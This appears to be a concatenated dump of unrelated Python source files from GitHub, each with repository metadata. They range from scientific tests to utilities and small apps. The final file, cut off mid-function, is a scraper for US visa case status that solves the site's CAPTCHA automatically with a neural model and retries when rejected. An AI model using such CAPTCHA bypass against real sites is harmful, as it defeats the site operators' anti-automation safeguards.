bool\n","repo_name":"nitin1993915/sentence_vectorizer","sub_path":"schema/response_model.py","file_name":"response_model.py","file_ext":"py","file_size_in_byte":275,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"22775400664","text":"import numpy as np\nfrom tests import binvox_rw_original\nfrom binvox import Binvox\nimport filecmp\n\n\ndef test_loading():\n # Load using original python script from Daniel Maturana\n with open('tests/chair.binvox', 'rb') as f:\n loaded_old = binvox_rw_original.read_as_3d_array(f)\n\n # Load with our library\n loaded_new = Binvox.read('tests/chair.binvox', mode='dense')\n\n # Check for the correctness of the data\n assert np.allclose(loaded_old.data, loaded_new.numpy())\n\n\ndef test_saving():\n # Load from binvox file\n binvox = Binvox.read('tests/chair.binvox', mode='dense')\n # Save to binvox file\n binvox.write('tests/chair_new.binvox')\n\n # Check for the equality of files\n assert filecmp.cmp('tests/chair.binvox', 'tests/chair_new.binvox')\n\n # Load from the newly saved file\n binvox_duplicate = Binvox.read('tests/chair_new.binvox', mode='dense')\n\n # Check correctness of data\n assert np.allclose(binvox.numpy(), binvox_duplicate.numpy())\n","repo_name":"faridyagubbayli/binvox","sub_path":"tests/test_load.py","file_name":"test_load.py","file_ext":"py","file_size_in_byte":987,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"75"} +{"seq_id":"11695255765","text":"# -*- coding: utf-8 -*-\nimport os\nimport sys\nfrom argparse import ArgumentParser\n\n\ndef find_templates(target):\n for root, dirs, files in os.walk(target):\n for fname in files:\n if fname[-3:] == '.j2' and fname[-7:] != '.min.j2':\n src_path = os.path.join(root, fname)\n dst_path = os.path.join(root, \"%s.min.j2\" % fname[:-3])\n yield (src_path, dst_path)\n\n\ndef minify_tpl(src_path, dst_path, inplace=False):\n # read input\n with open(src_path, 'r') as fsrc:\n src_data = fsrc.readlines()\n\n # write output\n with open(src_path if inplace else dst_path, 'w+') as fdst:\n for line in src_data:\n fdst.write(line.strip())\n\n\ndef main():\n try:\n pr = ArgumentParser(prog=None)\n pr.add_argument(\n '--quiet', dest='quiet', action='store_true',\n help=\"quiet operaton mode\")\n pr.add_argument(\n '--inplace', dest='inplace', action='store_true',\n help=\"minify templates inplace (replace original file)\")\n pr.add_argument(\n 'target',\n help=\"target parent folder to search for templates\")\n args = pr.parse_args()\n\n if not (len(args.target) and os.path.exists(args.target)):\n raise ValueError(\"invalid target path %s\" % args.target)\n\n if not args.quiet:\n print(\"minify templates under: %s\" % args.target)\n\n for fsrc, fdst in find_templates(args.target):\n if not args.quiet:\n print(\"template: %s\" % fsrc)\n minify_tpl(fsrc, fdst, inplace=args.inplace)\n\n except Exception as e:\n print(\"ERROR: %s\" % e)\n sys.exit(1)\n\n sys.exit(0)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"exonlabs/exonwebui","sub_path":"scripts/minify_templates.py","file_name":"minify_templates.py","file_ext":"py","file_size_in_byte":1748,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"75"} +{"seq_id":"29314317290","text":"from pathlib import Path\nfrom unittest import TestCase, mock\n\nfrom pytest_unordered import unordered\n\nfrom strelka.scanners.scan_email import ScanEmail as ScanUnderTest\nfrom strelka.tests import run_test_scan\n\n\ndef test_scan_email(mocker):\n \"\"\"\n Pass: Sample event matches output of scanner.\n Failure: Unable to load file or sample event fails to match.\n \"\"\"\n\n test_scan_event = {\n \"elapsed\": mock.ANY,\n \"flags\": [],\n \"total\": {\"attachments\": 2, \"extracted\": 2},\n \"body\": \"Lorem Ipsum\\n\\n[cid:image001.jpg@01D914BA.2B9507C0]\\n\\n\\nLorem ipsum dolor sit amet, consectetur adipisci...tristique mi, quis finibus justo augue non ligula. Quisque facilisis dui in orci aliquet fermentum.\\n\",\n \"domains\": unordered(\n [\n \"schemas.microsoft.com\",\n \"www.w3.org\",\n \"div.msonormal\",\n \"span.msohyperlink\",\n \"span.msohyperlinkfollowed\",\n \"span.emailstyle17\",\n \"1.0in\",\n \"div.wordsection1\",\n ]\n ),\n \"attachments\": {\n \"filenames\": [\"image001.jpg\", \"test.doc\"],\n \"hashes\": unordered(\n [\n \"ee97b5bb7816b8ad3c3b4024a5d7ff06\",\n \"33a13c0806ec35806889a93a5f259c7a\",\n ]\n ),\n \"totalsize\": 72819,\n },\n \"subject\": \"Lorem Ipsum\",\n \"to\": unordered([\"baz.quk@example.com\"]),\n \"from\": \"foo.bar@example.com\",\n \"date_utc\": \"2022-12-21T02:29:49.000Z\",\n \"message_id\": \"S7PR03MB5640AD212589DFB7CE58D90CFBEB9@DS7PR03MB5640.namprd03.prod.outlook.co\",\n \"received_domain\": unordered(\n [\n \"ch2pr03mb5366.namprd03.prod.outlook.com\",\n \"mx0b-0020ab02.pphosted.com\",\n \"pps.filterd\",\n \"mx.example.com\",\n \"ds7pr03mb5640.namprd03.prod.outlook.com\",\n \"mx0a-0020ab02.pphosted.com\",\n ]\n ),\n \"received_ip\": unordered(\n [\n \"022.12.20.18\",\n \"fe80::bd8e:df17:2c2f:2490\",\n \"8.17.1.19\",\n \"2603:10b6:5:2c0::11\",\n \"205.220.177.243\",\n \"2603:10b6:610:96::16\",\n \"127.0.0.1\",\n \"2002:a05:6500:11d0:b0:17b:2a20:6c32\",\n ]\n ),\n }\n\n scanner_event = run_test_scan(\n mocker=mocker,\n scan_class=ScanUnderTest,\n fixture_path=Path(__file__).parent / \"fixtures/test.eml\",\n )\n\n TestCase.maxDiff = None\n TestCase().assertDictEqual(test_scan_event, scanner_event)\n","repo_name":"target/strelka","sub_path":"src/python/strelka/tests/test_scan_email.py","file_name":"test_scan_email.py","file_ext":"py","file_size_in_byte":2665,"program_lang":"python","lang":"en","doc_type":"code","stars":755,"dataset":"github-code","pt":"75"} +{"seq_id":"24744109589","text":"from inspect import stack, getmodule\nfrom typing import List\n\ndef get_process_names() -> List:\n \"\"\"Get process names\n\n Returns:\n List: process names\n \"\"\"\n module_names = [\"none\"]\n for stack_entry in stack():\n current_module = getmodule(stack_entry[0])\n if current_module is not None:\n module_names += [current_module.__name__]\n\n return module_names","repo_name":"MahdiAll99/MEDimage","sub_path":"MEDimage/utils/find_process_names.py","file_name":"find_process_names.py","file_ext":"py","file_size_in_byte":398,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"75"} +{"seq_id":"26962213496","text":"\"\"\"Provides shared memory for direct access across processes.\r\nThe API of this package is currently provisional. Refer to the\r\ndocumentation for details.\r\n\"\"\"\r\n\r\n\r\n__all__ = [ 'SharedNumpyPool' ]\r\n\r\n\r\nfrom functools import partial\r\nimport mmap\r\nimport os\r\nimport errno\r\nimport struct\r\nimport secrets\r\nimport types\r\nimport numpy as np\r\n\r\n\r\n_O_CREX = os.O_CREAT | os.O_EXCL\r\n\r\n# FreeBSD (and perhaps other BSDs) limit names to 14 characters.\r\n_SHM_SAFE_NAME_LENGTH = 14\r\n\r\n\r\ndef _make_filename(directory):\r\n \"Create a random filename for the shared memory object.\"\r\n # number of random bytes to use for name\r\n nbytes = _SHM_SAFE_NAME_LENGTH // 2\r\n assert nbytes >= 2\r\n name = secrets.token_hex(nbytes)\r\n assert len(name) <= _SHM_SAFE_NAME_LENGTH\r\n return os.path.join(directory, name)\r\n\r\n\r\nclass SharedMemory:\r\n \"\"\"Creates a new shared memory block or attaches to an existing\r\n shared memory block.\r\n Every shared memory block is assigned a unique name. This enables\r\n one process to create a shared memory block with a particular name\r\n so that a different process can attach to that same shared memory\r\n block using that same name.\r\n As a resource for sharing data across processes, shared memory blocks\r\n may outlive the original process that created them. When one process\r\n no longer needs access to a shared memory block that might still be\r\n needed by other processes, the close() method should be called.\r\n When a shared memory block is no longer needed by any process, the\r\n unlink() method should be called to ensure proper cleanup.\"\"\"\r\n\r\n # Defaults; enables close() and unlink() to run without errors.\r\n _name = None\r\n _fd = -1\r\n _mmap = None\r\n _buf = None\r\n _flags = os.O_RDWR\r\n _mode = 0o600\r\n\r\n def __init__(self, directory, name=None, create=False, size=0):\r\n if not size >= 0:\r\n raise ValueError(\"'size' must be a positive integer\")\r\n if create:\r\n self._flags = _O_CREX | os.O_RDWR\r\n if size == 0:\r\n raise ValueError(\"'size' must be a positive number different from zero\")\r\n if name is None and not self._flags & os.O_EXCL:\r\n raise ValueError(\"'name' can only be None if create=True\")\r\n\r\n\r\n # Shared Memory\r\n try:\r\n os.makedirs(directory)\r\n except FileExistsError:\r\n pass\r\n\r\n if name is None:\r\n while True:\r\n name = _make_filename(directory)\r\n try:\r\n self._fd = os.open(name, self._flags, mode=self._mode)\r\n except FileExistsError:\r\n continue\r\n self._name = name\r\n break\r\n else:\r\n self._fd = os.open(name, self._flags, mode=self._mode)\r\n self._name = name\r\n try:\r\n if create and size:\r\n os.ftruncate(self._fd, size)\r\n stats = os.fstat(self._fd)\r\n size = stats.st_size\r\n self._mmap = mmap.mmap(self._fd, size)\r\n except OSError:\r\n self.unlink()\r\n raise\r\n\r\n self._size = size\r\n self._buf = memoryview(self._mmap)\r\n\r\n def __del__(self):\r\n try:\r\n self.close()\r\n except OSError:\r\n pass\r\n\r\n def __reduce__(self):\r\n return (\r\n self.__class__,\r\n (\r\n self.name,\r\n False,\r\n self.size,\r\n ),\r\n )\r\n\r\n def __repr__(self):\r\n return f'{self.__class__.__name__}({self.name!r}, size={self.size})'\r\n\r\n @property\r\n def buf(self):\r\n \"A memoryview of contents of the shared memory block.\"\r\n return self._buf\r\n\r\n @property\r\n def name(self):\r\n \"Unique name that identifies the shared memory block.\"\r\n return self._name\r\n\r\n @property\r\n def size(self):\r\n \"Size in bytes.\"\r\n return self._size\r\n\r\n def close(self):\r\n \"\"\"Closes access to the shared memory from this instance but does\r\n not destroy the shared memory block.\"\"\"\r\n if self._buf is not None:\r\n self._buf.release()\r\n self._buf = None\r\n if self._mmap is not None:\r\n self._mmap.close()\r\n self._mmap = None\r\n if self._fd >= 0:\r\n os.close(self._fd)\r\n self._fd = -1\r\n\r\n def unlink(self):\r\n \"\"\"Requests that the underlying shared memory block be destroyed.\r\n In order to ensure proper cleanup of resources, unlink should be\r\n called once (and only once) across all processes which have access\r\n to the shared memory block.\"\"\"\r\n if self._name:\r\n try:\r\n os.remove(self._name)\r\n except:\r\n pass\r\n\r\n\r\n\r\nclass SharedNumpyPool:\r\n def __init__(self, directory, max_size=0, name=None, table={}, used=0):\r\n self.shm = None if name is None else SharedMemory(name=name, directory=directory)\r\n self.table = table\r\n self.used = used\r\n self.max_size = max_size\r\n self.lazy = False\r\n self.directory = directory\r\n\r\n def allocate_lazy(self):\r\n assert self.shm is None\r\n self.lazy = True\r\n yield None\r\n self.lazy = False\r\n assert self.shm is None\r\n self.max_size = (self.used//4096+1) * 4096\r\n self.used = 0\r\n self.shm = SharedMemory(create=True, size=self.max_size, directory=self.directory)\r\n yield None\r\n\r\n def allocate(self, key, shape, dtype=np.float32):\r\n assert self.table.get(key) is None\r\n size = np.dtype(dtype).itemsize\r\n for i in shape:\r\n size *= i\r\n self.used += size\r\n if not self.lazy:\r\n assert self.max_size >= size\r\n assert self.shm is not None\r\n self.table[key] = (shape, dtype, self.used - size, self.used, size // shape[0])\r\n return np.ndarray(shape, dtype=dtype, buffer=self.shm.buf[self.used - size:self.used])\r\n\r\n def allocate_copies(self, key, arr):\r\n return self.allocate(key, arr.shape, arr.dtype.str)\r\n\r\n def get(self, key, rg=None, reduce=False):\r\n shape, dtype, begin, end, csize = self.table[key]\r\n if rg is None:\r\n return np.ndarray(shape, dtype=dtype, buffer=self.shm.buf[begin:end])\r\n if reduce and rg[1] - rg[0] == 1:\r\n return np.ndarray(shape[1:], dtype=dtype, buffer=self.shm.buf[begin+rg[0]*csize:begin+rg[1]*csize])\r\n return np.ndarray((rg[1]-rg[0], *shape[1:]), dtype=dtype, buffer=self.shm.buf[begin+rg[0]*csize:begin+rg[1]*csize])\r\n\r\n def dump(self):\r\n return {\r\n 'max_size': self.max_size,\r\n 'name': self.shm.name,\r\n 'table': self.table,\r\n 'used': self.used,\r\n 'directory': self.directory\r\n }\r\n\r\n def __del__(self):\r\n if self.shm is not None:\r\n self.shm.close()\r\n self.shm.unlink()\r\n\r\n \r\n","repo_name":"siyandong/NeuralCoMapping","sub_path":"env/gibson_api/utils/shared_memory.py","file_name":"shared_memory.py","file_ext":"py","file_size_in_byte":6998,"program_lang":"python","lang":"en","doc_type":"code","stars":61,"dataset":"github-code","pt":"75"} +{"seq_id":"7840103860","text":"from django.shortcuts import render\nfrom django.core.paginator import Paginator, EmptyPage, PageNotAnInteger\nimport copy\n\n_MY_FOODS = ['apple', 'banana', 'orrange', 'grape', 'spam']\n_ITEM_IN_EACH_PAGE = 2\n\ndef index(request):\n foods = copy.deepcopy(_MY_FOODS)\n\n request_page = request.GET.get('page')\n paginator = Paginator(foods, _ITEM_IN_EACH_PAGE)\n\n try:\n pages = paginator.get_page(request_page)\n except PageNotAnInteger:\n pages = paginator.get_page(1)\n except EmptyPage:\n pages = paginator.get_page(paginator.num_pages)\n\n return render(request, 'manypages/index.html', { 'pages': pages })","repo_name":"ymatsukawa/scrape_tool","sub_path":"test/manypages/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":635,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"30300091929","text":"import ROOT,os\nfrom Core.Utils.printFunc import pyPrint\nfrom Utils.System import system\n\nROOT.gROOT.SetBatch(ROOT.kTRUE)\n\ndef clearHist(h):\n for i in range(1,h.GetNbinsX()+1):\n if h.GetBinContent(i) < 0.: h.SetBinContent(i,0.)\n\ndef getIntegralAndError(hist):\n clearHist(hist)\n err = ROOT.Double(0.)\n integral = hist.IntegralAndError(1,hist.GetNbinsX()+1,err)\n return integral,err\n\n# ________________________________________________________________________________ ||\n#out_path = \"ZPlusX/Systematic/2019-05-03_Run2016/\"\n#out_path = \"ZPlusX/Systematic/2019-05-03_Run2017/\"\nout_path = \"ZPlusX/Systematic/2019-05-03_Run2018/\"\n\nUser = os.environ['USER']\ninputPath = system.getStoragePath()+\"/\"+User+\"/Higgs/DarkZ/\"+out_path+\"/ZPlusX/DataMCDistribution.root\"\nhistNames = [\n \"Z2_4e_mass\",\n \"Z2_2mu2e_mass\",\n \"Z2_4mu_mass\",\n \"Z2_2e2mu_mass\",\n ]\n\npyPrint(\"Input path: \"+inputPath)\n\n# ________________________________________________________________________________ ||\nf = ROOT.TFile.Open(inputPath)\nfor histName in histNames:\n pyPrint(\"-\"*20)\n pyPrint(histName)\n h_nominal = f.Get(histName)\n integral_nominal,error_nominal = getIntegralAndError(h_nominal)\n pyPrint(\"Nominal: \"+str(integral_nominal)+\" +/- \"+str(error_nominal))\n \n h_UniIso = f.Get(histName+\"_UniIso\")\n integral_UniIso,error_UniIso = getIntegralAndError(h_UniIso)\n pyPrint(\"Nominal: \"+str(integral_UniIso)+\" +/- \"+str(error_UniIso))\n \n h_AsymIso = f.Get(histName+\"_AsymIso\")\n integral_AsymIso,error_AsymIso = getIntegralAndError(h_AsymIso)\n pyPrint(\"Nominal: \"+str(integral_AsymIso)+\" +/- \"+str(error_AsymIso))\n \n syst = max([\n abs(integral_nominal-integral_UniIso)/integral_nominal,\n abs(integral_nominal-integral_AsymIso)/integral_nominal,\n ]\n )\n pyPrint(\"Systematic: %4.2f %%\"%(syst*100.))\n","repo_name":"lucien1011/PyNTupleProcessor","sub_path":"DarkZ/Script/make_ZPlusX_syst_cfg.py","file_name":"make_ZPlusX_syst_cfg.py","file_ext":"py","file_size_in_byte":1947,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"11552096581","text":"#!/usr/bin/env python\n#-*- coding:utf8 -*-\n\"\"\"\n__iter__() 方法返回对象本身,是for遇见使用迭代器的要求\n__next__() 方法返回容器中下一个元素或数据,当容器中数据用尽时,引发StopIteration异常\n\"\"\"\n#自定义迭代器\nclass MyIterator:\n def __init__(self,x=2,xmax=100):\n '''\n 定义构造方法,初始化属性\n '''\n self.__mul,self.__x = x,x\n self.__xmax = xmax\n\n def __iter__(self):\n \"\"\"\n :return:定义迭代器协议方法,返回类本身\n \"\"\"\n return self\n\n def __next__(self):\n if self.__x and self.__x != 1:\n self.__mul *= self.__x\n if self.__mul <= self.__xmax:\n return self.__mul\n else:\n raise StopIteration\n else:\n raise StopIteration\n\nif __name__ == '__main__':\n myiter = MyIterator()\n for i in myiter:\n print(\"迭代器的数据元素为{}\".format(i))","repo_name":"hujianli94/Python-code","sub_path":"7.迭代器、生成器、装饰器/迭代器/迭代器.py","file_name":"迭代器.py","file_ext":"py","file_size_in_byte":983,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"75"} +{"seq_id":"16802721033","text":"from kivy.app import App\r\nfrom kivy.uix.boxlayout import BoxLayout\r\nfrom kivy.uix.label import Label\r\nfrom kivy.uix.textinput import TextInput\r\nfrom kivy.uix.button import Button\r\n\r\n\r\nclass ReminderApp(App):\r\n def build(self):\r\n layout = BoxLayout(orientation='vertical')\r\n\r\n self.input = TextInput(multiline=False, input_filter='int', hint_text='Enter 5 digits')\r\n self.input.bind(on_text_validate=self.set_reminder)\r\n layout.add_widget(self.input)\r\n\r\n button_layout = BoxLayout(orientation='horizontal')\r\n\r\n enter_button = Button(text='Enter Reminder')\r\n enter_button.bind(on_press=self.set_reminder)\r\n button_layout.add_widget(enter_button)\r\n\r\n change_button = Button(text='Change Reminder')\r\n change_button.bind(on_press=self.change_reminder)\r\n button_layout.add_widget(change_button)\r\n\r\n layout.add_widget(button_layout)\r\n\r\n self.reminder_label = Label(text='')\r\n layout.add_widget(self.reminder_label)\r\n\r\n self.reminder_set = False\r\n\r\n # Add a TextInput for entering current readings\r\n self.readings_input = TextInput(multiline=False, input_filter='int', hint_text='Enter current readings')\r\n layout.add_widget(self.readings_input)\r\n\r\n # Add a button to enter current readings and check reminder\r\n enter_reading_button = Button(text='Enter Current Readings')\r\n enter_reading_button.bind(on_press=self.enter_current_readings)\r\n layout.add_widget(enter_reading_button)\r\n\r\n return layout\r\n\r\n def set_reminder(self, instance):\r\n input_text = self.input.text\r\n\r\n if len(input_text) != 5:\r\n self.reminder_label.text = 'Please enter 5 digits.'\r\n return\r\n\r\n self.reminder_set = True\r\n self.reminder = int(input_text)\r\n self.reminder_label.text = f'Reminder is set for {self.reminder}'\r\n\r\n def change_reminder(self, instance):\r\n self.reminder_set = False\r\n self.reminder_label.text = 'Reminder cleared. Please enter a new 5-digit reminder.'\r\n\r\n def enter_current_readings(self, instance):\r\n current_readings = self.readings_input.text\r\n self.readings_input.text = current_readings\r\n self.check_reminder(None)\r\n\r\n def check_reminder(self, instance):\r\n if not self.reminder_set:\r\n self.reminder_label.text = 'Please set a reminder first.'\r\n return\r\n\r\n input_text = self.readings_input.text\r\n\r\n if not input_text:\r\n self.reminder_label.text = 'Please enter a number to check.'\r\n return\r\n\r\n input_value = int(input_text)\r\n diff = abs(input_value - self.reminder)\r\n\r\n if input_value == self.reminder:\r\n self.reminder_label.text = 'Reminder: Do not forget to get oil changed!'\r\n elif input_value < self.reminder:\r\n self.reminder_label.text = f'You still have {diff} kms left before oil change.'\r\n else:\r\n self.reminder_label.text = 'Please get oil changed!'\r\n\r\n\r\nif __name__ == '__main__':\r\n ReminderApp().run()\r\n","repo_name":"Raffey26/Oil-chng-rem","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3108,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"20141514080","text":"from datetime import datetime\n\nfrom common.logger import get_logger\nfrom verification.domain.factory.verification_factory import VerificationFactory\nfrom verification.infrastructure.models import VerificationModel\nfrom verification.infrastructure.repositories.base_repository import BaseRepository\n\nlogger = get_logger(__name__)\n\n\nclass VerificationRepository(BaseRepository):\n\n def get_all_verification(self, entity_id, verification_type):\n try:\n verification_db_list = self.session.query(VerificationModel) \\\n .filter(VerificationModel.entity_id == entity_id) \\\n .filter(VerificationModel.verification_type == verification_type).all()\n verifications = VerificationFactory.verification_entity_from_db_list(verification_db_list)\n self.session.commit()\n except:\n self.session.rollback()\n raise\n return verifications\n\n def __get_verification_db(self, verification_id=None, entity_id=None):\n verification_db_query = self.session.query(VerificationModel)\n if entity_id is not None:\n verification_db_query = verification_db_query.filter(VerificationModel.entity_id == entity_id)\\\n .order_by(VerificationModel.created_at.desc())\n elif verification_id is not None:\n verification_db_query = verification_db_query.filter(VerificationModel.id == verification_id)\n else:\n return None\n verification_db = verification_db_query.first()\n return verification_db\n\n def add_verification(self, verification):\n self.add_item(VerificationModel(\n id=verification.id, verification_type=verification.type, entity_id=verification.entity_id,\n status=verification.status, requestee=verification.requestee, created_at=verification.created_at,\n updated_at=verification.updated_at))\n\n def get_verification(self, verification_id=None, entity_id=None):\n try:\n verification_db = self.__get_verification_db(verification_id, entity_id)\n verification = None\n if verification_db is not None:\n verification = VerificationFactory.verification_entity_from_db(verification_db)\n self.session.commit()\n except:\n self.session.rollback()\n raise\n return verification\n\n def update_verification(self, verification):\n try:\n verification_db = self.__get_verification_db(verification_id=verification.id)\n if verification_db is None:\n logger.error(f\"Verification not found with id {verification.verification_id}\")\n raise Exception(f\"No verification found for {verification.id}\")\n verification_db.status = verification.status\n verification_db.reject_reason = verification.reject_reason\n verification_db.updated_at = datetime.utcnow()\n self.session.commit()\n except:\n self.session.rollback()\n raise\n\n def get_verification_list(self, verification_type, status):\n try:\n verification_query = self.session.query(VerificationModel)\n if verification_type is not None:\n verification_query = verification_query.filter(VerificationModel.verification_type == verification_type)\n if status is not None:\n verification_query = verification_query.filter(VerificationModel.status == status)\n verification_db = verification_query.all()\n verification = VerificationFactory.verification_entity_from_db_list(verification_db)\n self.session.commit()\n except:\n self.session.rollback()\n raise\n return verification\n","repo_name":"singnet/snet-marketplace-service","sub_path":"verification/infrastructure/repositories/verification_repository.py","file_name":"verification_repository.py","file_ext":"py","file_size_in_byte":3764,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"76"} +{"seq_id":"25656557531","text":"import time\nimport unittest\n\nfrom fabric_cf.actor.core.common.constants import Constants\nfrom fabric_cf.actor.core.core.unit import Unit, UnitState\nfrom fabric_cf.actor.core.kernel.reservation_client import ClientReservationFactory\nfrom fabric_cf.actor.core.kernel.slice import SliceFactory\nfrom fabric_cf.actor.core.plugins.substrate.db.substrate_actor_database import SubstrateActorDatabase\nfrom fabric_cf.actor.core.util.id import ID\nfrom fabric_cf.actor.core.util.resource_type import ResourceType\nfrom fabric_cf.actor.test.base_test_case import BaseTestCase\n\n\nclass UnitTest(BaseTestCase, unittest.TestCase):\n from fabric_cf.actor.core.container.globals import Globals\n Globals.config_file = \"./config/config.test.yaml\"\n Constants.SUPERBLOCK_LOCATION = './state_recovery.lock'\n\n from fabric_cf.actor.core.container.globals import GlobalsSingleton\n GlobalsSingleton.get().start(force_fresh=True)\n while not GlobalsSingleton.get().start_completed:\n time.sleep(0.0001)\n\n def make_actor_database(self) -> SubstrateActorDatabase:\n from fabric_cf.actor.core.container.globals import GlobalsSingleton\n return GlobalsSingleton.get().get_container().get_actor().get_plugin().get_database()\n\n def test_unit(self):\n rid = ID()\n u1 = Unit(rid=rid)\n self.assertIsNotNone(u1.get_id())\n self.assertEqual(UnitState.DEFAULT, u1.get_state())\n self.assertIsNone(u1.get_property(name=\"foo\"))\n self.assertIsNone(u1.get_parent_id())\n self.assertIsNotNone(u1.get_reservation_id())\n self.assertIsNone(u1.get_slice_id())\n self.assertIsNone(u1.get_actor_id())\n\n self.assertEqual(0, u1.get_sequence())\n u1.increment_sequence()\n self.assertEqual(1, u1.get_sequence())\n u1.decrement_sequence()\n self.assertEqual(0, u1.get_sequence())\n\n db = self.make_actor_database()\n\n slice_id = ID()\n from fabric_cf.actor.core.container.globals import GlobalsSingleton\n actor_id = GlobalsSingleton.get().get_container().get_actor().get_guid()\n\n slice_obj = SliceFactory.create(slice_id=slice_id, name=\"test_slice\")\n db.add_slice(slice_object=slice_obj)\n\n reservation = ClientReservationFactory.create(rid=rid, slice_object=slice_obj)\n u1.set_actor_id(actor_id=actor_id)\n u1.set_reservation(reservation=reservation)\n u1.set_slice_id(slice_id=slice_id)\n\n db.add_reservation(reservation=reservation)\n\n u1.start_prime()\n self.assertEqual(UnitState.PRIMING, u1.get_state())\n u1.set_property(name=\"foo\", value=\"bar\")\n u1.increment_sequence()\n u1.increment_sequence()\n resource_type = ResourceType(resource_type=\"1\")\n u1.set_resource_type(rtype=resource_type)\n self.assertEqual(2, u1.get_sequence())\n\n db.add_unit(u=u1)\n\n self.assertIsNotNone(db.get_unit(uid=rid))\n","repo_name":"fabric-testbed/ControlFramework","sub_path":"fabric_cf/actor/test/core/core/unit_test.py","file_name":"unit_test.py","file_ext":"py","file_size_in_byte":2910,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"74917697525","text":"from typing import Dict, List\nimport requests\nimport os\nfrom bs4 import BeautifulSoup\nfrom urllib.parse import urljoin\nfrom pprint import pprint\nimport logging\nimport onnxruntime as ort\nimport numpy as np\nfrom PIL import Image\nimport string\nfrom io import BytesIO\nimport logging\nimport json\nfrom cryptography.hazmat.primitives.asymmetric import rsa, padding\nfrom cryptography.hazmat.primitives import serialization, hashes\nimport base64\nimport time\nlogger = logging.getLogger()\n\ncharacters = '-' + string.digits + string.ascii_uppercase\nwidth, height, n_len, n_classes = 200, 50, 6, len(characters)\n\nprivate_key_path = os.path.join(os.path.dirname(os.path.realpath(__file__)), \"private_key.pem\")\nprivate_key = serialization.load_pem_private_key(\n open(private_key_path, 'rb').read(),\n password=None,\n)\n\ndef decode(sequence):\n a = ''.join([characters[x] for x in sequence])\n s = ''.join([x for j, x in enumerate(a[:-1]) if x != characters[0] and x != a[j+1]])\n if len(s) == 0:\n return ''\n if a[-1] != characters[0] and s[-1] != a[-1]:\n s += a[-1]\n return s\n\ncaptcha_onnx = os.path.join(os.path.dirname(os.path.realpath(__file__)), \"captcha.onnx\")\nORT_SESS = ort.InferenceSession(captcha_onnx, providers=['CPUExecutionProvider'])\n\ndef pred(img_content):\n img = np.asarray( Image.open(BytesIO(img_content)) ,dtype=np.float32) / 255.0\n img = np.expand_dims(np.transpose(img,(2,0,1)), axis=0)\n outputs = ORT_SESS.run(None, {'input': img})\n x = outputs[0]\n t = np.argmax( np.transpose(x,(1,0,2)), -1)\n pred = decode(t[0])\n return pred\n\nERR_CAPTCHA = \"The code entered does not match the code displayed on the page.\"\nERR_NOCASE = \"Your search did not return any data.\"\nERR_INVCODE = \"Invalid Application ID or Case Number.\"\nERR_DECRYPT = \"Decrypt Error\"\n\nURL = \"https://ceac.state.gov/CEACStatTracker/Status.aspx?App=NIV\"\n\ns = requests.Session()\ns.headers[\"User-Agent\"]=\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0\"\n\n\ndef read_hidden_input(soup: BeautifulSoup):\n ret = {}\n input_list = soup.find_all(\"input\", attrs={ \"type\":\"hidden\"})\n for x in input_list:\n ret[x.attrs[\"name\"]] = x.attrs[\"value\"]\n return ret\n\ndef get_post_data(soup=None):\n if soup is None:\n html = s.get(URL).text\n soup = BeautifulSoup(html, features=\"html.parser\")\n data = read_hidden_input(soup)\n CaptchaImageUrl = soup.find(id=\"c_status_ctl00_contentplaceholder1_defaultcaptcha_CaptchaImage\").attrs[\"src\"]\n img_resp = s.get(urljoin(URL,CaptchaImageUrl))\n data[\"ctl00$ContentPlaceHolder1$Captcha\"]=pred(img_resp.content)\n data[\"ctl00_ToolkitScriptManager1_HiddenField\"]=\";;AjaxControlToolkit, Version=3.5.51116.0, Culture=neutral, PublicKeyToken=28f01b0e84b6d53e:en-US:2a06c7e2-728e-4b15-83d6-9b269fb7261e:de1feab2:f2c8e708:8613aea7:f9cec9bc:3202a5a2:a67c2700:720a52bf:589eaa30:ab09e3fe:87104b7c:be6fb298\"\n data[\"ctl00$ContentPlaceHolder1$Visa_Application_Type\"]=\"NIV\"\n data[\"__EVENTTARGET\"]=\"ctl00$ContentPlaceHolder1$btnSubmit\"\n data[\"ctl00$ToolkitScriptManager1\"]=\"ctl00$ContentPlaceHolder1$UpdatePanel1|ctl00$ContentPlaceHolder1$btnSubmit\"\n data[\"LBD_BackWorkaround_c_status_ctl00_contentplaceholder1_defaultcaptcha\"]=\"1\"\n data[\"__EVENTARGUMENT\"]=\"\"\n data[\"__LASTFOCUS\"]=\"\"\n return data\n\ndef query_ceac_state(loc, case_no, passport_number, surname, data=None):\n if data is None:\n data = get_post_data()\n data[\"ctl00$ContentPlaceHolder1$Location_Dropdown\"]=loc\n data[\"ctl00$ContentPlaceHolder1$Visa_Case_Number\"]=case_no\n data[\"ctl00$ContentPlaceHolder1$Passport_Number\"] = passport_number\n data[\"ctl00$ContentPlaceHolder1$Surname\"] = surname\n\n resp = s.post(URL,data)\n soup = BeautifulSoup(resp.text, features=\"html.parser\")\n\n error_tag = soup.find(id=\"ctl00_ContentPlaceHolder1_ValidationSummary1\")\n if error_tag is None:\n # Request Rejected\n # Second captcha and just retry\n return ERR_CAPTCHA, None\n\n error_text = error_tag.text.strip()\n if error_text:\n return error_text, None\n\n error_text = soup.find(id=\"ctl00_ContentPlaceHolder1_lblError\").text\n if error_text:\n return error_text, None\n status = soup.find(id=\"ctl00_ContentPlaceHolder1_ucApplicationStatusView_lblStatus\").text\n caseno = soup.find(id=\"ctl00_ContentPlaceHolder1_ucApplicationStatusView_lblCaseNo\").text\n SubmitDate = 